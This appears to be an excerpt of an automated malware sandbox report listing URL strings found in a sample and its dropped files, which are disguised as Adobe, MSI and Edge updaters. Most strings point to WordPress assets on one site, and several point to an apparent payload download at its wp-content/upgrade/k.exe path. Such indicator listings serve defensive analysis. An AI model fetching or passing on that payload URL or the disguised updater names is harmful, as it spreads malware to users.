                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/css/helper-parts.min.css?ver=6
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/css/main.min.css?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/js/main.min.js?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/plugins/elementor/assets/js/eleme
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/shortcodes/parallax-images/assets
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/css/plugins/animate/animate.min.css?ver=6.5.
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/grid.css?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.css?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.js?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-blocks/inc/slider/assets/plugins/5.4.5/swiper.min.css?ver=
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qode-framework/inc/common/assets/plugins/select2/select2.full
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.6.13
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.6.13
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.13
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=7.8.0
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.8.0
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/themes/newhome/assets/css/main.min.css?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/themes/newhome/assets/js/main.min.js?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/themes/newhome/style.css?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe(
                        Source: file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe9
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exeY
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exexe
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/03/error-page-bg-img.jpg);
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/03/title-bg-img.jpg);
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-180x180.png
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-192x192.png
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-270x270.png
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-32x32.png
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/06/live-chat.png
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/06/logo-white.png
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/06/logo.png
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/09/logo.png
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/elementor/css/custom-frontend-lite.min.css?ver=1690457761
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.cs
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.css?ver=1687512247
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/elementor/css/global.css?ver=1690457762
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/elementor/css/post-2951.css?ver=1690457763
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/elementor/css/post-2986.css?ver=1697730127
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/elementor/css/post-6.css?ver=1690457761
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/dist/hooks.min.js?ver=2810c76e705dd1a53b18
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/hoverIntent.min.js?ver=1.10.2
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.2
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/underscore.min.js?ver=1.13.4
Source: file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | String found in binary or memory: https://easy2buy.ae/wp-json/
Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | String found in binary or memory: https://easy2buy.ae/xmlrpc.php
Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | String found in binary or memory: https://easy2buy.ae/xmlrpc.php?rsd
Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://easy2buy.ae:80/
Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://easy2buy.ae:80/ntControlSet
Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://easy2buy.ae:80/wp-content/upgrade/k.exe
Source: file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://easy2buy.j$
Source: file.exe, 00000000.00000003.2602210305.00000000062F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601885569.00000000062F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://easy2buyler.175
Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | String found in binary or memory: https://embed.tawk.to/64c7994d94cf5d49dc678105/1h6lqtm4g
